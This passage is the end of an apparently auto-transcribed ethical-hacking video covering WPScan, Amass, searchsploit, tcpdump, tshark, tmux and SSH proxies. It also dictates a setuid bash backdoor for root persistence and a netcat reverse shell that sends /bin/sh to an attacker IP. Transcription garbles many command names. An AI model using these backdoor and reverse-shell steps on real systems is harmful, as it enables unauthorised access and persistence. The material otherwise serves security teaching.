or do something pretty aggressive. We'll do VP, VT, dash dash plugins, dash detection, and we'll add aggressive at the end, just to make sure we get our point across. This is a super aggressive vulnerability scan.

Let's try it out. you may have noticed that all of those commands did not output anything fun because you need an API token from WP scan, which you can get for free right now. And then you would run the commands like this, specifying your API token with the dash dash API dash token switch.

A mass is another tool you can use for subdomain enumeration, install it with APT install and to run it. We'll type in a mass, type in enum dash D to specify our domain network chuck.com and let it go. This tool might run forever.

I don't want to wait for it though. Control C to stop that. But man, look at all the stuff about to do a more passive enumeration. You can do this, a mass and numb and we'll specify dash passive and then our domain. Whereas the other one was a bit more active.

I like a mass because it does this options based on what our scope is. And we'll go ahead and stop that. This next command opens up the door to new commands. What does that mean?

You'll see it's a tool called get, which will often use when you first start out to interact with GitHub. Let me show you, there's a tool we're about to use called search ploy. But the way we use this tool is by downloading it from GitHub. And actually I lied. This is a GitLab repository, but it's pretty much the same thing.

You'll use Git all the time to install all kinds of stuff. But first we have to install Git. apt install git. You probably already have it. And then probably my favorite command is git clone.

We're going to clone a tool onto our computer. And in our case, it will be search void. Let's go.

To properly use that command, we'll add a symbolic link. We're not gonna talk about that, just know it's a command below. And then finally we can use the command searchsploit, right? Yeah, it's gonna work.

Let's try searching for WordPress plugins. It'll search for exploits that involve WordPress plugins. What about SSH? A ton of exploits pertaining to SSH. Super handy tool.

If you want to update the database, searchsploit-u. Crazy powerful tool. Now here's John Hammond with a real hacking command. It's kind of awesome. Let me get into the real, genuine, ethical hacking and penetration testing, my favorite top hacking command.

Here's the thing. When you're on the command line interacting with the shell, you're actually running this program called Bash, or the born-again shell. Now, that lives on the file system in slash bin bash. So if I were to actually execute this, it doesn't look like it does anything.

I just get the prompt back because I've just invoked and I'm running a shell or terminal inside my shell. So I could exit out of that and get back to my original prompt. But bin bash actually takes a special argument called TACP. And that will enforce and maintain set UID permissions, which means that the owner of the file root in this case, the admin absolute controller of the computer will be able to keep their permissions, but it has to be a set UID binary. So the way that we could do that.

is actually change mod or ch modifications change modifications on the file and add or plus the s letter for set uid we'll put that on bin bash and this will require some root privileges that means that you need to be the admin to be able to configure this but what that ultimately does is create a back door where you have a persistence mechanism a little bit of a foothold so that at any point If we configure this with our pseudo password later on down the line, you get access to this machine one more time. Now you can just run bash tag P and you are root. You control the whole machine because you are the admin user. You set up that back door. If you wanted to, you could move into the root directory and you could do anything that you want.

Maybe we could echo hello into a please subscribe. to network chuck i'll hit enter on that and now if i zoom out let me show you this lstackla we can see our file right there please subscribe to network chuck hey just owned and controlled by the root user and we were able to configure that with our backdoor sudo chmod plus s bin bash that is my favorite top hacking command because then you've got a backdoor. You've got a persistence mechanism and a way to become root at any point.

I hope you enjoyed a couple of those really neat, hey, top hacking commands, but thank you so much Network Chuck for letting me join the party here. This was an absolute blast. Now I'm going to do something bad.

I want to do the same command twice. What? No, I know it's okay. We're going to talk about TCP dump again.

Why? Well, because there's more cool stuff about it and we didn't give it enough time. We'll type in TCP dump.

We'll type in dash w to send it to a file. We'll just call it capture dot pcap then dash I for our interface and we'll do ethernet zero. That's the one I have now. Let me just make sure that's the case. IP address.

Yes. Ethernet zero and go. Now we'll generate some traffic.

Do something fun that we've already learned and map with random addresses. Decoys. We'll stop that with control C. We can analyze that traffic with this command. tcpdump-r.

Specify our capture file, we'll just capture.pcap. Let's take a look. Cool, we can see it. We can also limit the amount of packets we capture.

tcpdump and the switch dash C for count and we'll say like 100. That did not take long. Now tcpdump is pretty cool. Great for quick captures but the real tool you want to use that's crazy powerful is Tshark, the command line brother of Wireshark. To install Tshark, we'll do apt install Tshark. Tshark can do a lot.

Let's try a few things. First, we'll type in Tshark and we'll capture one packet. Just one.

We'll put it in verbose mode with dash capital V. We'll do dash C for count. We'll do one and then dash I, ethernet zero. One packet captured.

And then look at all the stuff it shows us. That is so powerful. Networking geeks are just drooling.

So yes, I'm drooling. Do you want to see something crazier? Filters.

Watch this. Tshark. We'll do a dash Y to apply a display filter.

With a single quote, we'll specify it. We'll do http.request.method space equals equals and a double quote to get. And then close it out with a single quote. I know it's kind of wordy, but check this out.

Let's specify our interface. Get that zero. And we're now capturing and only showing get request.

How cool is that? Let's generate some curlacademy.networkchuck.com. There's another one.

That's so cool. Now one of the most powerful ways we can use Tshark is by analyzing packet captures. So let's do a capture real quick to a file, Tshark, and actually no, I'm gonna show you one cool thing.

We'll use a command called timeout and put in 15 seconds and it will timeout or stop this packet capture in 15 seconds. It's pretty cool. Tshark dash i ethernet 0 and with the dash w command similar to tcpdump we'll send that to a file.

Tshark dash pgap. Let me try to generate some quick traffic. And done. To display statistics and specifically to follow endpoint connections, use this command, tshark-r. We'll specify our capture, which was tshark.pcap.

Then we'll use the switches dash qz and specify endpoints comma ip. How cool is that? We can also follow a TCP stream with tshark-r, our capture, dash qz, and we'll say follow comma.

TCP, and we'll put that in ASCII. So ASCII, we'll do comma, we'll follow the seventh stream. That's pretty cool. Let's try, I don't know, the first stream.

First stream's crazy. Let's do the 20th stream. 100th stream. So powerful.

We could also simply do custom output of fields based on the capture we're reviewing. Check this out. Tsharp, do a dash E, IP dot source.

Dash E, IP dot dest, or DST. Dash E, frame dot protocols. Notice we're specifying fields.

We'll do a dash T, fields. Which is telling it to only output the fields we're specifying. And then finally"-r", specifying our capture.

How cool is that? So powerful. This is my new favorite tool, TMUX. A terminal multiplexer.

Install TMUX with apt install tmux. And then simply type in tmux. We suddenly have a new terminal that we can do stuff in, like pingingacademy.networkchuck.com. Leave that there, hit Ctrl B, and then D on your keyboard. You're detached from it, and then with TMUX A, get right back to it.

How powerful is that? I'll stop this, type in exit to close that out. We can create multiple sessions and name them.

So tmux new dash S and name it Bob. Here's Bob, we'll ping something here. Detach from that, create another session, Suzy.

And now if I type in tmux ls, I've got two sessions and I can reattach to either of them. tmux a dash T to specify my target will say Suzy. Jumping right back in there.

I can hit Control-B and then W to quickly jump between my various TMUX sessions. And I can leave, go to another computer, jump back in here, and connect to any one of these sessions. If you wanna learn more, I did a whole video on TMUX right up here.

SSH, we use it all the time to remote into our systems. So for example, this Ubuntu guy. To jump into him, I'll use SSH.

SSH, network Chuck at his IP address. Already cool, but it can do more. Instead of logging in, I can actually just run a command via SSH on another system. with SSH, network chuck at my server, and then right after that, specify the command I want to run.

So in single quotes, I can say, who am I? Bam. Or IP address. Crazy powerful. Let's get crazier.

You can actually make it a SOCKS proxy. What? Watch this. Before I create the tunnel, let me demonstrate my location right now.

What's my IP address? I'm in Dallas, Texas as you can see right here. But if I use this crazy SSH command, I'll create a proxy and tunnel myself somewhere else. SSH-D, which is telling it to create a SOCKS proxy and I'll say port 1337. We'll do a"-C for compression,"-Q for quiet mode, and"-N to not execute any commands. And finally our server information. Root, at, and this will be a server in Japan. Put our password in. Now we're gonna launch Chromium using that proxy. Our SOCKS5, the local host. Ready, set, go. Chromium's launched. Now let's see where we are. Already feel a bit different. And given that I'm having a hard time figuring out where to go, I'm definitely in Osaka, Japan. Super cool, right? Netcat, our go-to for reverse shows. To install Netcat, we'll do apt install netcat-traditional. To verify, just type in nc-h. With Netcat installed on both your attacking computer and your target computer, let's do a reverse shell. On the attacker, all we gotta do is wait. Wait for the shell. Type in NC-LVP in the port you're waiting on. 1337. We're waiting. Because on a reverse shell, the target reaches out to us. On the target side, I will type in NC for Netcat. We'll do a dash E and specify the shell we wanna have access to. So we'll do forward slash bin, forward slash sh, specify our attacker IP, which is us, and the port, 1337, that the attacker is listening on. And then we'll hit enter, and something happened? It sure stinking did, check it out. I'm on the other computer. I've got a reverse shell. Now you can also do a fun thing where you just set up a simple chat server with Netcap. Why? I don't know, but you can do it. You should try it. It's fun. On one side you type in nc-lvp, set a port. On the other side, type in nc-v, the IP address of the other computer, and the port. So now I can say, hey, and I get hey on the other side. What are you thinking about? The end of this video. Me too. I'll catch you guys next time. For real though. Bye.

Transcript for:Essential Hacking Commands Overview

Transcript for:
Essential Hacking Commands Overview